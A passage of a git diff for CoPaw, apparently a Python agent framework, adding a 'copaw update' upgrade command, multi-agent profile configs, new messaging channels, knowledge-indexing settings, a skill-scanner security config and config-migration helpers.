+ click.echo("") + click.echo( + "[copaw] Updating CoPaw " + f"{plan['current_version']} -> {plan['latest_version']}...", + ) + click.echo(f"[copaw] Using installer: {plan['installer_label']}") + + try: + with subprocess.Popen( + command, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + **_subprocess_text_kwargs(), + bufsize=1, + ) as proc: + if proc.stdout is not None: + for line in proc.stdout: + click.echo(line.rstrip()) + return_code = proc.wait() + except FileNotFoundError as exc: + click.echo(f"[copaw] Update failed: {exc}") + return_code = 1 + finally: + try: + path.unlink(missing_ok=True) + except OSError: + pass + + if return_code == 0: + click.echo("[copaw] Update completed successfully.") + click.echo( + "[copaw] Please restart any running CoPaw service " + "to use the new version.", + ) + else: + click.echo(f"[copaw] Update failed with exit code {return_code}.") + click.echo( + "[copaw] Please fix the error above and run " + "`copaw update` again.", + ) + + return return_code + + +def _echo_install_summary(info: InstallInfo, latest_version: str) -> None: + """Print the update summary shown before launching the worker.""" + click.echo(f"Current version: {__version__}") + click.echo(f"Latest version: {latest_version}") + click.echo(f"Python: {info.python_executable}") + click.echo( + f"Environment: {info.environment_kind} " + f"({info.environment_root})", + ) + click.echo(f"Install path: {info.package_dir}") + click.echo(f"Installer: {info.installer}") + + +def _confirm_source_override(info: InstallInfo, yes: bool) -> bool: + """Confirm whether a non-PyPI installation should be overwritten.""" + if info.source_type == "pypi": + return True + + detail = f" ({info.source_url})" if info.source_url else "" + message = ( + "Detected a non-PyPI installation source: " + f"{info.source_type}{detail}. Updating will overwrite the current " + "installation with the PyPI release for this environment." + ) + + if yes: + click.echo( + f"Warning: {message} Proceeding because `--yes` was provided.", + ) + return True + + click.echo(f"Warning: {message}") + return click.confirm( + "Continue and replace the current installation with the PyPI " + "version?", + default=False, + ) + + +@click.command("update") +@click.option( + "--yes", + is_flag=True, + help="Do not prompt before starting the update", +) +@click.pass_context +def update_cmd(ctx: click.Context, yes: bool) -> None: + """Upgrade CoPaw in the current Python environment.""" + info = _detect_installation() + latest_version = _fetch_latest_version() + + _echo_install_summary(info, latest_version) + + version_check = _is_newer_version(latest_version, __version__) + if version_check is False: + click.echo("CoPaw is already up to date.") + return + + if not _confirm_source_override(info, yes): + click.echo("Cancelled.") + return + + if version_check is None: + if yes: + click.echo( + "Warning: unable to compare the current version" + f"({__version__}) with the latest version ({latest_version})" + " automatically. Proceeding because `--yes` was provided.", + ) + elif not click.confirm( + f"Unable to compare the current version ({__version__}) with the " + f"latest version ({latest_version}) automatically. Continue with " + "update anyway?", + default=False, + ): + click.echo("Cancelled.") + return + + running = _detect_running_service( + ctx.obj.get("host") if ctx.obj else None, + ctx.obj.get("port") if ctx.obj else None, + ) + if running.is_running: + if yes: + raise click.ClickException( + "Detected " + f"{_running_service_display(running)}. " + "Please stop it before running `copaw update`, or rerun " + "without `--yes` to confirm a forced `copaw shutdown`.", + ) + if not _confirm_force_shutdown(running): + click.echo("Cancelled.") + return + _run_shutdown_for_update(info, running) + running = _detect_running_service( + ctx.obj.get("host") if ctx.obj else None, + ctx.obj.get("port") if ctx.obj else None, + ) + if running.is_running: + raise click.ClickException( + "Detected " + f"{_running_service_display(running)} after `copaw shutdown`. " + "Please stop it manually before running `copaw update`.", + ) + + if not yes and not click.confirm( + f"Update CoPaw to {latest_version} in the current environment?", + default=True, + ): + click.echo("Cancelled.") + return + + command, installer_label = _build_upgrade_command(info, latest_version) + plan = { + "current_version": __version__, + "latest_version": latest_version, + "installer_label": installer_label, + "command": command, + "install": asdict(info), + "launcher_pid": os.getpid() if sys.platform == "win32" else None, + } + plan_path = _write_worker_plan(plan) + click.echo("") + click.echo("Starting CoPaw update...") + + if sys.platform == "win32": + _run_update_worker_detached(plan_path) + click.echo( + "On Windows, the update will continue after this command exits " + "to avoid locking `copaw.exe`.", + ) + click.echo("Keep this terminal open until the update completes.") + return + + return_code = _run_update_worker_foreground(plan_path) + + if return_code != 0: + ctx.exit(return_code) diff --git a/src/copaw/config/__init__.py b/src/copaw/config/__init__.py index d8a8add6b..0dad53827 100644 --- a/src/copaw/config/__init__.py +++ b/src/copaw/config/__init__.py @@ -22,15 +22,15 @@ update_last_dispatch, ) -# ConfigWatcher is provided by __getattr__ (lazy-loaded). -# pylint: disable=undefined-all-variable __all__ = [ "AgentsRunningConfig", "Config", "ChannelConfig", "ChannelConfigUnion", "HeartbeatConfig", - "ConfigWatcher", + "SecurityConfig", + "ToolGuardConfig", + "ToolGuardRuleConfig", "get_available_channels", "get_config_path", "get_heartbeat_config", @@ -42,12 +42,3 @@ "save_config", "update_last_dispatch", ] - - -def __getattr__(name: str): - """Lazy-load ConfigWatcher to avoid pulling app.channels/lark_oapi.""" - if name == "ConfigWatcher": - from .watcher import ConfigWatcher - - return ConfigWatcher - raise AttributeError(f"module {__name__!r} has no attribute {name!r}") diff --git a/src/copaw/config/config.py b/src/copaw/config/config.py index 2e8757464..de313acec 100644 --- a/src/copaw/config/config.py +++ b/src/copaw/config/config.py @@ -1,13 +1,28 @@ # -*- coding: utf-8 -*- import os +import json +from pathlib import Path from typing import Optional, Union, Dict, List, Literal + from pydantic import BaseModel, Field, ConfigDict, model_validator +import shortuuid -from ..providers.models import ModelSlotConfig +from .timezone import detect_system_timezone from ..constant import ( HEARTBEAT_DEFAULT_EVERY, HEARTBEAT_DEFAULT_TARGET, + WORKING_DIR, ) +from ..providers.models import ModelSlotConfig + + +def generate_short_agent_id() -> str: + """Generate a 6-character short UUID for agent identification. + + Returns: + 6-character short UUID string + """ + return shortuuid.ShortUUID().random(length=6) class BaseChannelConfig(BaseModel): @@ -27,7 +42,7 @@ class BaseChannelConfig(BaseModel): class IMessageChannelConfig(BaseChannelConfig): db_path: str = "~/Library/Messages/chat.db" poll_sec: float = 1.0 - media_dir: str = "~/.copaw/media" + media_dir: Optional[str] = None max_decoded_size: int = ( 10 * 1024 * 1024 ) # 10MB default limit for Base64 data @@ -42,7 +57,11 @@ class DiscordConfig(BaseChannelConfig): class DingTalkConfig(BaseChannelConfig): client_id: str = "" client_secret: str = "" - media_dir: str = "~/.copaw/media" + message_type: str = "markdown" + card_template_id: str = "" + card_template_key: str = "content" + robot_code: str = "" + media_dir: Optional[str] = None class FeishuConfig(BaseChannelConfig): @@ -54,7 +73,7 @@ class FeishuConfig(BaseChannelConfig): app_secret: str = "" encrypt_key: str = "" verification_token: str = "" - media_dir: str = "~/.copaw/media" + media_dir: Optional[str] = None class QQConfig(BaseChannelConfig): @@ -91,7 +110,7 @@ class MattermostConfig(BaseChannelConfig): url: str = "" bot_token: str = "" - media_dir: str = "~/.copaw/media/mattermost" + media_dir: Optional[str] = None show_typing: Optional[bool] = None thread_follow_without_mention: bool = False @@ -102,6 +121,16 @@ class ConsoleConfig(BaseChannelConfig): enabled: bool = True +class WecomConfig(BaseChannelConfig): + """WeCom (Enterprise WeChat) AI Bot channel config.""" + + bot_id: str = "" + secret: str = "" + media_dir: Optional[str] = None + welcome_text: str = "" + max_reconnect_attempts: int = -1 + + class MatrixConfig(BaseChannelConfig): """Matrix channel configuration.""" @@ -124,6 +153,16 @@ class VoiceChannelConfig(BaseChannelConfig): welcome_greeting: str = "Hi! This is CoPaw. How can I help you?" +class XiaoYiConfig(BaseChannelConfig): + """XiaoYi channel: Huawei A2A protocol via WebSocket.""" + + ak: str = "" # Access Key + sk: str = "" # Secret Key + agent_id: str = "" # Agent ID from XiaoYi platform + ws_url: str = "wss://hag.cloud.huawei.com/openclaw/v1/ws/link" + task_timeout_ms: int = 3600000 # 1 hour task timeout + + class ChannelConfig(BaseModel): """Built-in channel configs; extra keys allowed for plugin channels.""" @@ -140,6 +179,8 @@ class ChannelConfig(BaseModel): console: ConsoleConfig = ConsoleConfig() matrix: MatrixConfig = MatrixConfig() voice: VoiceChannelConfig = VoiceChannelConfig() + wecom: WecomConfig = WecomConfig() + xiaoyi: XiaoYiConfig = XiaoYiConfig() class LastApiConfig(BaseModel): @@ -182,6 +223,25 @@ class AgentsRunningConfig(BaseModel): "Maximum number of reasoning-acting iterations for ReAct agent" ), ) + + token_count_model: str = Field( + default="default", + description="Model to use for token counting", + ) + + token_count_estimate_divisor: float = Field( + default=3.75, + gt=1, + description=( + "Divisor for character-based token estimation " "(len / divisor)" + ), + ) + + token_count_use_mirror: bool = Field( + default=False, + description="Whether to use mirror token counting", + ) + max_input_length: int = Field( default=128 * 1024, # 128K = 131072 tokens ge=1000, @@ -205,12 +265,12 @@ class AgentsRunningConfig(BaseModel): ) enable_tool_result_compact: bool = Field( - default=False, + default=True, description="Whether to compact tool result messages in memory", ) tool_result_compact_keep_n: int = Field( - default=5, + default=3, ge=1, le=10, description=( @@ -218,6 +278,72 @@ class AgentsRunningConfig(BaseModel): ), ) + knowledge_enabled: bool = Field( + default=True, + description="Master switch for knowledge features and operations", + ) + + knowledge_auto_collect_chat_files: bool = Field( + default=True, + description=( + "Automatically collect file references in chat turns into knowledge sources" + ), + ) + + knowledge_auto_collect_chat_urls: bool = Field( + default=True, + description=( + "Automatically collect URLs mentioned in chat turns into knowledge sources" + ), + ) + + knowledge_auto_collect_long_text: bool = Field( + default=True, + description=( + "Automatically save long chat passages into text knowledge sources" + ), + ) + + knowledge_long_text_min_chars: int = Field( + default=2000, + ge=200, + le=20000, + description="Minimum character count for auto-saving long text", + ) + + knowledge_chunk_size: int = Field( + default=1200, + ge=200, + le=8000, + description="Chunk size for knowledge indexing", + ) + + knowledge_retrieval_enabled: bool = Field( + default=True, + description="Enable chat-time retrieval augmentation from indexed knowledge", + ) + + knowledge_retrieval_top_k: int = Field( + default=4, + ge=1, + le=20, + description="Number of knowledge hits injected into chat context", + ) + + knowledge_retrieval_max_context_chars: int = Field( + default=1800, + ge=300, + le=8000, + description="Maximum characters for injected retrieval context", + ) + + knowledge_retrieval_min_score: float = Field( + default=1.0, + ge=0.0, + le=100.0, + description="Minimum lexical score threshold for injected knowledge hits", + ) + @property def memory_compact_reserve(self) -> int: """Memory compact reserve size (tokens).""" @@ -254,37 +380,161 @@ class AgentsLLMRoutingConfig(BaseModel): ) -class AgentsConfig(BaseModel): - defaults: AgentsDefaultsConfig = Field( - default_factory=AgentsDefaultsConfig, +class AgentProfileRef(BaseModel): + """Agent Profile reference (stored in root config.json). + + Only contains ID and workspace directory reference. + Full agent configuration is stored in workspace/agent.json. + """ + + id: str = Field(..., description="Unique agent ID") + workspace_dir: str = Field( + ..., + description="Path to agent's workspace directory", + ) + + +class AgentProfileConfig(BaseModel): + """Complete Agent Profile configuration (stored in workspace/agent.json). + + Each agent has its own configuration file with all settings. + """ + + id: str = Field(..., description="Unique agent ID") + name: str = Field(..., description="Human-readable agent name") + description: str = Field(default="", description="Agent description") + workspace_dir: str = Field( + default="", + description="Path to agent's workspace (optional, for reference)", + ) + + # Agent-specific configurations + channels: Optional["ChannelConfig"] = Field( + default=None, + description="Channel configurations for this agent", + ) + mcp: Optional["MCPConfig"] = Field( + default=None, + description="MCP clients for this agent", + ) + heartbeat: Optional[HeartbeatConfig] = Field( + default=None, + description="Heartbeat configuration for this agent", + ) + last_dispatch: Optional["LastDispatchConfig"] = Field( + default=None, + description="Last dispatch target for this agent", ) running: AgentsRunningConfig = Field( default_factory=AgentsRunningConfig, + description="Runtime configuration", ) llm_routing: AgentsLLMRoutingConfig = Field( default_factory=AgentsLLMRoutingConfig, - description="LLM routing settings (local/cloud).", + description="LLM routing settings", + ) + active_model: Optional["ModelSlotConfig"] = Field( + default=None, + description="Active model for this agent (provider_id + model)", ) language: str = Field( default="zh", - description="Language for agent MD files (zh/en/ru)", + description="Language setting for this agent", ) - installed_md_files_language: Optional[str] = Field( + system_prompt_files: List[str] = Field( + default_factory=lambda: ["AGENTS.md", "SOUL.md", "PROFILE.md"], + description="System prompt markdown files", + ) + tools: Optional["ToolsConfig"] = Field( + default=None, + description="Tools configuration for this agent", + ) + security: Optional["SecurityConfig"] = Field( default=None, - description="Language of currently installed md files", + description="Security configuration for this agent", + ) + + +class AgentsConfig(BaseModel): + """Agents configuration (root config.json only contains references).""" + + active_agent: str = Field( + default="default", + description="Currently active agent ID", + ) + profiles: Dict[str, AgentProfileRef] = Field( + default_factory=lambda: { + "default": AgentProfileRef( + id="default", + workspace_dir=f"{WORKING_DIR}/workspaces/default", + ), + }, + description="Agent profile references (ID and workspace path only)", + ) + + # Legacy fields for backward compatibility (deprecated) + # These fields MUST have default values (not None) to support downgrade + defaults: Optional[AgentsDefaultsConfig] = None + running: AgentsRunningConfig = Field( + default_factory=AgentsRunningConfig, + ) + llm_routing: AgentsLLMRoutingConfig = Field( + default_factory=AgentsLLMRoutingConfig, ) + language: str = Field(default="zh") + installed_md_files_language: Optional[str] = None system_prompt_files: List[str] = Field( default_factory=lambda: ["AGENTS.md", "SOUL.md", "PROFILE.md"], - description="List of markdown files to load into system prompt", + ) + audio_mode: Literal["auto", "native"] = Field( + default="auto", + description=( + "How to handle incoming audio/voice messages. " + '"auto": transcribe if a provider is available, otherwise show ' + "file-uploaded placeholder; " + '"native": send audio blocks directly to the model ' + "(may need ffmpeg)." + ), + ) + + transcription_provider_type: Literal[ + "disabled", + "whisper_api", + "local_whisper", + ] = Field( + default="disabled", + description=( + "Transcription backend. " + '"disabled": no transcription; ' + '"whisper_api": remote OpenAI-compatible endpoint; ' + '"local_whisper": locally installed openai-whisper.' + ), + ) + transcription_provider_id: str = Field( + default="", + description=( + "Provider ID for Whisper API transcription. " + "Empty = no provider selected. " + 'Only used when transcription_provider_type is "whisper_api".' + ), + ) + transcription_model: str = Field( + default="whisper-1", + description=( + "Model name for Whisper API transcription. " + 'e.g. "whisper-1", "whisper-large-v3".' + ), ) + class LastDispatchConfig(BaseModel): """Last channel/user/session that received a user-originated reply.""" channel: str = "" user_id: str = "" session_id: str = "" + dispatched_at: str = "" class MCPClientConfig(BaseModel): @@ -386,6 +636,73 @@ class BuiltinToolConfig(BaseModel): name: str = Field(..., description="Tool function name") enabled: bool = Field(True, description="Whether the tool is enabled") description: str = Field(default="", description="Tool description") + display_to_user: bool = Field( + True, + description="Whether tool output is rendered to user channels", + ) + + +def _default_builtin_tools() -> Dict[str, BuiltinToolConfig]: + """Return a fresh copy of the canonical built-in tool definitions.""" + return { + "execute_shell_command": BuiltinToolConfig( + name="execute_shell_command", + enabled=True, + description="Execute shell commands", + ), + "read_file": BuiltinToolConfig( + name="read_file", + enabled=True, + description="Read file contents", + ), + "write_file": BuiltinToolConfig( + name="write_file", + enabled=True, + description="Write content to file", + ), + "edit_file": BuiltinToolConfig( + name="edit_file", + enabled=True, + description="Edit file using find-and-replace", + ), + "browser_use": BuiltinToolConfig( + name="browser_use", + enabled=True, + description="Browser automation and web interaction", + ), + "desktop_screenshot": BuiltinToolConfig( + name="desktop_screenshot", + enabled=True, + description="Capture desktop screenshots", + ), + "view_image": BuiltinToolConfig( + name="view_image", + enabled=True, + description="Load an image into LLM context " + "for visual analysis", + display_to_user=False, + ), + "send_file_to_user": BuiltinToolConfig( + name="send_file_to_user", + enabled=True, + description="Send files to user", + ), + "get_current_time": BuiltinToolConfig( + name="get_current_time", + enabled=True, + description="Get current date and time", + ), + "set_user_timezone": BuiltinToolConfig( + name="set_user_timezone", + enabled=True, + description="Set user timezone", + ), + "get_token_usage": BuiltinToolConfig( + name="get_token_usage", + enabled=True, + description="Get llm token usage", + ), + } class ToolsConfig(BaseModel): @@ -438,9 +755,42 @@ class ToolsConfig(BaseModel): enabled=True, description="Get llm token usage", ), + "knowledge_search": BuiltinToolConfig( + name="knowledge_search", + enabled=True, + description="Search indexed knowledge sources", + ), + "graph_query": BuiltinToolConfig( + name="graph_query", + enabled=False, + description="Run graph-oriented knowledge query", + ), + "memify_run": BuiltinToolConfig( + name="memify_run", + enabled=False, + description="Trigger memify enrichment jobs", + ), + "memify_status": BuiltinToolConfig( + name="memify_status", + enabled=False, + description="Query memify enrichment job status", + ), + "triplet_focus_search": BuiltinToolConfig( + name="triplet_focus_search", + enabled=False, + description="Run triplet-focused graph retrieval", + ), }, ) + @model_validator(mode="after") + def _merge_default_tools(self): + """Ensure new code-defined tools are present in saved configs.""" + for name, tc in _default_builtin_tools().items(): + if name not in self.builtin_tools: + self.builtin_tools[name] = tc + return self + class ToolGuardRuleConfig(BaseModel): """A single user-defined guard rule (stored in config.json).""" @@ -470,12 +820,198 @@ class ToolGuardConfig(BaseModel): disabled_rules: List[str] = Field(default_factory=list) +class SkillScannerWhitelistEntry(BaseModel): + """A whitelisted skill (identified by name + content hash).""" + + skill_name: str + content_hash: str = Field( + default="", + description="SHA-256 of concatenated file contents at whitelist time. " + "Empty string means any content is allowed.", + ) + added_at: str = Field( + default="", + description="ISO 8601 timestamp when the entry was added.", + ) + + +class SkillScannerConfig(BaseModel): + """Skill scanner settings under ``security.skill_scanner``. + + ``mode`` controls the scanner behavior: + * ``"block"`` – scan and block unsafe skills. + * ``"warn"`` – scan but only log warnings, do not block (default). + * ``"off"`` – disable scanning entirely. + """ + + mode: Literal["block", "warn", "off"] = Field( + default="warn", + description="Scanner mode: block, warn, or off.", + ) + timeout: int = Field( + default=30, + ge=5, + le=300, + description="Max seconds to wait for a scan to complete.", + ) + whitelist: List[SkillScannerWhitelistEntry] = Field( + default_factory=list, + description="Skills that bypass security scanning.", + ) + + class SecurityConfig(BaseModel): """Top-level ``security`` section in config.json.""" tool_guard: ToolGuardConfig = Field(default_factory=ToolGuardConfig) + skill_scanner: SkillScannerConfig = Field( + default_factory=SkillScannerConfig, + ) + +class SkillMarketSpec(BaseModel): + """A single skills market entry.""" + + id: str = Field(..., description="Stable market id") + name: str = Field(..., description="Display name") + type: Literal["git"] = Field(default="git") + url: str = Field(..., description="Git repository URL") + branch: str = Field(default="", description="Optional branch") + path: str = Field( + default="index.json", + description="Path to market index file in repo", + ) + enabled: bool = Field(default=True) + order: int = Field(default=999) + trust: Optional[Literal["official", "community", "custom"]] = None + + +class SkillsMarketCacheConfig(BaseModel): + """Cache policy for market index aggregation.""" + + ttl_sec: int = Field(default=600, ge=0, le=24 * 3600) + + +class SkillsMarketInstallConfig(BaseModel): + """Default install behavior for marketplace installs.""" + + overwrite_default: bool = Field(default=False) + + +class SkillsMarketConfig(BaseModel): + """Skills market root config.""" + + version: int = Field(default=1, ge=1) + markets: List[SkillMarketSpec] = Field(default_factory=list) + cache: SkillsMarketCacheConfig = Field( + default_factory=SkillsMarketCacheConfig, + ) + install: SkillsMarketInstallConfig = Field( + default_factory=SkillsMarketInstallConfig, + ) + + +class KnowledgeSourceSpec(BaseModel): + """A configured knowledge source.""" + + id: str = Field( + ..., + min_length=1, + max_length=64, + pattern=r"^[A-Za-z0-9][A-Za-z0-9._-]*$", + ) + name: str = Field(..., min_length=1, max_length=120) + type: Literal["file", "directory", "url", "text", "chat"] = Field( + default="file", + ) + location: str = Field(default="") + content: str = Field(default="") + enabled: bool = Field(default=True) + recursive: bool = Field(default=True) + tags: List[str] = Field(default_factory=list) + summary: str = Field(default="") + + @model_validator(mode="after") + def validate_source(self): + if self.type in {"file", "directory", "url"} and not self.location.strip(): + raise ValueError( + f"location is required for knowledge source type '{self.type}'", + ) + if self.type == "text" and not ( + self.content.strip() or self.location.strip() + ): + raise ValueError( + "content or location is required for knowledge source type 'text'", + ) + return self + + +class KnowledgeIndexConfig(BaseModel): + """Indexing behavior for knowledge sources.""" + + chunk_size: int = Field(default=1200, ge=200, le=8000) + chunk_overlap: int = Field(default=150, ge=0, le=2000) + max_file_size: int = Field(default=512 * 1024, ge=1024, le=20 * 1024 * 1024) + include_globs: List[str] = Field( + default_factory=lambda: [ + "**/*.md", + "**/*.txt", + "**/*.rst", + "**/*.json", + "**/*.yaml", + "**/*.yml", + "**/*.toml", + "**/*.py", + ], + ) + exclude_globs: List[str] = Field( + default_factory=lambda: [ + ".git/**", + "node_modules/**", + ".venv/**", + "dist/**", + "build/**", + "__pycache__/**", + ], + ) +class KnowledgeAutomationConfig(BaseModel): + """Passive knowledge collection during chat turns.""" + + knowledge_auto_collect_chat_files: bool = Field(default=True) + knowledge_auto_collect_chat_urls: bool = Field(default=True) + knowledge_auto_collect_long_text: bool = Field(default=True) + knowledge_long_text_min_chars: int = Field(default=2000, ge=200, le=20000) + + url_exclude_private_addresses: bool = Field( + default=True, + description="Auto-exclude localhost and private IP/intranet URLs (127.x, 192.168.x, 10.x, etc.)", + ) + url_exclude_token_params: bool = Field( + default=True, + description="Auto-exclude URLs whose query string contains credential params (access_token, api_key, etc.)", + ) + url_exclude_patterns: List[str] = Field( + default_factory=list, + description="Additional URL exclusion patterns; each entry is a URL prefix or glob (e.g. 'https://hooks.slack.com/')", + ) + + +class KnowledgeConfig(BaseModel): + """Root config for the knowledge layer.""" + + version: int = Field(default=1, ge=1) + enabled: bool = Field(default=False) + engine: Literal["local_lexical"] = Field(default="local_lexical") + graph_query_enabled: bool = Field(default=False) + triplet_search_enabled: bool = Field(default=False) + memify_enabled: bool = Field(default=False) + allow_cypher_query: bool = Field(default=False) + sources: List[KnowledgeSourceSpec] = Field(default_factory=list) + index: KnowledgeIndexConfig = Field(default_factory=KnowledgeIndexConfig) + automation: KnowledgeAutomationConfig = Field( + default_factory=KnowledgeAutomationConfig, + ) class Config(BaseModel): """Root config (config.json).""" @@ -484,9 +1020,18 @@ class Config(BaseModel): tools: ToolsConfig = Field(default_factory=ToolsConfig) last_api: LastApiConfig = LastApiConfig() agents: AgentsConfig = Field(default_factory=AgentsConfig) + knowledge: KnowledgeConfig = Field(default_factory=KnowledgeConfig) + skills_market: SkillsMarketConfig = Field( + default_factory=SkillsMarketConfig, + ) last_dispatch: Optional[LastDispatchConfig] = None security: SecurityConfig = Field(default_factory=SecurityConfig) show_tool_details: bool = True + user_timezone: str = Field( + default_factory=detect_system_timezone, + description="User IANA timezone (e.g. Asia/Shanghai). " + "Defaults to the system timezone.", + ) ChannelConfigUnion = Union[ @@ -501,4 +1046,268 @@ class Config(BaseModel): ConsoleConfig, MatrixConfig, VoiceChannelConfig, + WecomConfig, + XiaoYiConfig, ] + + +# Agent configuration utility functions + + +def load_agent_config(agent_id: str) -> AgentProfileConfig: + """Load agent's complete configuration from workspace/agent.json. + + Args: + agent_id: Agent ID to load + + Returns: + AgentProfileConfig: Complete agent configuration + + Raises: + ValueError: If agent ID not found in root config + """ + from .utils import load_config + + config = load_config() + + if agent_id not in config.agents.profiles: + raise ValueError(f"Agent '{agent_id}' not found in config") + + agent_ref = config.agents.profiles[agent_id] + workspace_dir = Path(agent_ref.workspace_dir).expanduser() + agent_config_path = workspace_dir / "agent.json" + + if not agent_config_path.exists(): + # Fallback: Try to use root config fields for backward compatibility + # This allows downgrade scenarios where agent.json doesn't exist yet + fallback_config = AgentProfileConfig( + id=agent_id, + name=agent_id.title(), + description=f"{agent_id} agent", + workspace_dir=str(workspace_dir), + # Inherit from root config if available (for backward compat) + channels=( + config.channels + if hasattr(config, "channels") and config.channels + else None + ), + mcp=config.mcp if hasattr(config, "mcp") and config.mcp else None, + tools=( + config.tools + if hasattr(config, "tools") and config.tools + else None + ), + security=( + config.security + if hasattr(config, "security") and config.security + else None + ), + # Use agent-specific configs with proper defaults + running=( + config.agents.running + if hasattr(config.agents, "running") and config.agents.running + else AgentsRunningConfig() + ), + llm_routing=( + config.agents.llm_routing + if hasattr(config.agents, "llm_routing") + and config.agents.llm_routing + else AgentsLLMRoutingConfig() + ), + system_prompt_files=( + config.agents.system_prompt_files + if hasattr(config.agents, "system_prompt_files") + and config.agents.system_prompt_files + else ["AGENTS.md", "SOUL.md", "PROFILE.md"] + ), + ) + # Save for future use + save_agent_config(agent_id, fallback_config) + return fallback_config + + with open(agent_config_path, "r", encoding="utf-8") as f: + data = json.load(f) + + # Normalize legacy ~/.copaw-bound paths to current WORKING_DIR. + # This keeps COPAW_WORKING_DIR effective even if existing agent.json + # contains older hard-coded paths like "~/.copaw/media". + try: + from .utils import _normalize_working_dir_bound_paths + + data = _normalize_working_dir_bound_paths(data) + except Exception: + pass + + return AgentProfileConfig(**data) + + +def save_agent_config( + agent_id: str, + agent_config: AgentProfileConfig, +) -> None: + """Save agent configuration to workspace/agent.json. + + Args: + agent_id: Agent ID + agent_config: Complete agent configuration to save + + Raises: + ValueError: If agent ID not found in root config + """ + from .utils import load_config + + config = load_config() + + if agent_id not in config.agents.profiles: + raise ValueError(f"Agent '{agent_id}' not found in config") + + agent_ref = config.agents.profiles[agent_id] + workspace_dir = Path(agent_ref.workspace_dir).expanduser() + workspace_dir.mkdir(parents=True, exist_ok=True) + + agent_config_path = workspace_dir / "agent.json" + + with open(agent_config_path, "w", encoding="utf-8") as f: + json.dump( + agent_config.model_dump(exclude_none=True), + f, + ensure_ascii=False, + indent=2, + ) + + +def migrate_legacy_config_to_multi_agent() -> bool: + """Migrate legacy single-agent config to new multi-agent structure. + + Returns: + bool: True if migration was performed, False if already migrated + """ + from .utils import load_config, save_config + + config = load_config() + + # Check if already migrated (new structure has only AgentProfileRef) + if "default" in config.agents.profiles: + agent_ref = config.agents.profiles["default"] + # If it's already a AgentProfileRef, migration done + if isinstance(agent_ref, AgentProfileRef): + # Check if default agent config exists + workspace_dir = Path(agent_ref.workspace_dir).expanduser() + agent_config_path = workspace_dir / "agent.json" + if agent_config_path.exists(): + return False # Already migrated + + # Perform migration + print("Migrating legacy config to multi-agent structure...") + + # Extract legacy agent configuration + legacy_agents = config.agents + + # Create default agent workspace + default_workspace = Path(f"{WORKING_DIR}/workspaces/default").expanduser() + default_workspace.mkdir(parents=True, exist_ok=True) + + # Create default agent configuration from legacy settings + default_agent_config = AgentProfileConfig( + id="default", + name="Default Agent", + description="Default CoPaw agent", + workspace_dir=str(default_workspace), + channels=config.channels if config.channels else None, + mcp=config.mcp if config.mcp else None, + heartbeat=( + legacy_agents.defaults.heartbeat + if legacy_agents.defaults + else None + ), + running=( + legacy_agents.running + if legacy_agents.running + else AgentsRunningConfig() + ), + llm_routing=( + legacy_agents.llm_routing + if legacy_agents.llm_routing + else AgentsLLMRoutingConfig() + ), + system_prompt_files=( + legacy_agents.system_prompt_files + if legacy_agents.system_prompt_files + else ["AGENTS.md", "SOUL.md", "PROFILE.md"] + ), + tools=config.tools if config.tools else None, + security=config.security if config.security else None, + ) + + # Save default agent configuration to workspace + agent_config_path = default_workspace / "agent.json" + with open(agent_config_path, "w", encoding="utf-8") as f: + json.dump( + default_agent_config.model_dump(exclude_none=True), + f, + ensure_ascii=False, + indent=2, + ) + + # Migrate existing workspace files from legacy default working dir. + # When COPAW_WORKING_DIR is customized, historical data may still exist + # under "~/.copaw". + old_workspace = Path("~/.copaw").expanduser().resolve() + + # Move sessions, memory, and other workspace files + for item_name in ["sessions", "memory", "jobs.json"]: + old_path = old_workspace / item_name + if old_path.exists(): + new_path = default_workspace / item_name + if not new_path.exists(): + import shutil + + if old_path.is_dir(): + shutil.copytree(old_path, new_path) + else: + shutil.copy2(old_path, new_path) + print(f" Migrated {item_name} to default workspace") + + # Copy markdown files (AGENTS.md, SOUL.md, PROFILE.md) + for md_file in ["AGENTS.md", "SOUL.md", "PROFILE.md"]: + old_md = old_workspace / md_file + if old_md.exists(): + new_md = default_workspace / md_file + if not new_md.exists(): + import shutil + + shutil.copy2(old_md, new_md) + print(f" Migrated {md_file} to default workspace") + + # Update root config.json to new structure + # CRITICAL: Preserve legacy agent fields for downgrade compatibility + config.agents = AgentsConfig( + active_agent="default", + profiles={ + "default": AgentProfileRef( + id="default", + workspace_dir=str(default_workspace), + ), + }, + # Preserve legacy fields with values from migrated agent config + running=default_agent_config.running, + llm_routing=default_agent_config.llm_routing, + language=( + default_agent_config.language + if hasattr(default_agent_config, "language") + else "zh" + ), + system_prompt_files=default_agent_config.system_prompt_files, + ) + + # IMPORTANT: Keep channels, mcp, tools, security in root config for + # backward compatibility. Do NOT clear these fields. + # Old versions expect these fields to exist with valid values. + + save_config(config) + + print("Migration completed successfully!") + print(f" Default agent workspace: {default_workspace}") + print(f" Default agent config: {agent_config_path}") + + return True diff --git a/src/copaw/config/context.py b/src/copaw/config/context.py new file mode 100644 index 000000000..e10368127 --- /dev/null +++ b/src/copaw/config/context.py @@ -0,0 +1,33 @@ +# -*- coding: utf-8 -*- +"""Context variable for agent workspace directory. + +This module provides a context variable to pass the agent's workspace +directory to tool functions, allowing them to resolve relative paths +correctly in a multi-agent environment. +""" +from contextvars import ContextVar +from pathlib import Path + +# Context variable to store the current agent's workspace directory +current_workspace_dir: ContextVar[Path | None] = ContextVar( + "current_workspace_dir", + default=None, +) + + +def get_current_workspace_dir() -> Path | None: + """Get the current agent's workspace directory from context. + + Returns: + Path to the current agent's workspace directory, or None if not set. + """ + return current_workspace_dir.get() + + +def set_current_workspace_dir(workspace_dir: Path | None) -> None: + """Set the current agent's workspace directory in context. + + Args: + workspace_dir: Path to the agent's workspace directory. + """ + current_workspace_dir.set(workspace_dir) diff --git a/src/copaw/config/timezone.py b/src/copaw/config/timezone.py new file mode 100644 index 000000000..635201295 --- /dev/null +++ b/src/copaw/config/timezone.py @@ -0,0 +1,47 @@ +# -*- coding: utf-8 -*- +"""Detect the system IANA timezone. + +Kept in its own module to avoid circular imports between config.py and +utils.py. Uses only the standard library; always returns a valid string +(falls back to ``"UTC"``). +""" + +from __future__ import annotations + +import os +from datetime import datetime, timezone + + +def detect_system_timezone() -> str: + """Return the IANA timezone name of the host, falling back to ``UTC``.""" + try: + local_name = ( + datetime.now(timezone.utc) + .astimezone() + .tzinfo.tzname(None) # type: ignore[union-attr] + ) + if local_name and "/" in local_name: + return local_name + except Exception: + pass + + tz_env = os.environ.get("TZ", "") + if tz_env and "/" in tz_env: + return tz_env + + try: + with open("/etc/timezone", encoding="utf-8") as f: + name = f.read().strip() + if name and "/" in name: + return name + except OSError: + pass + + try: + link = 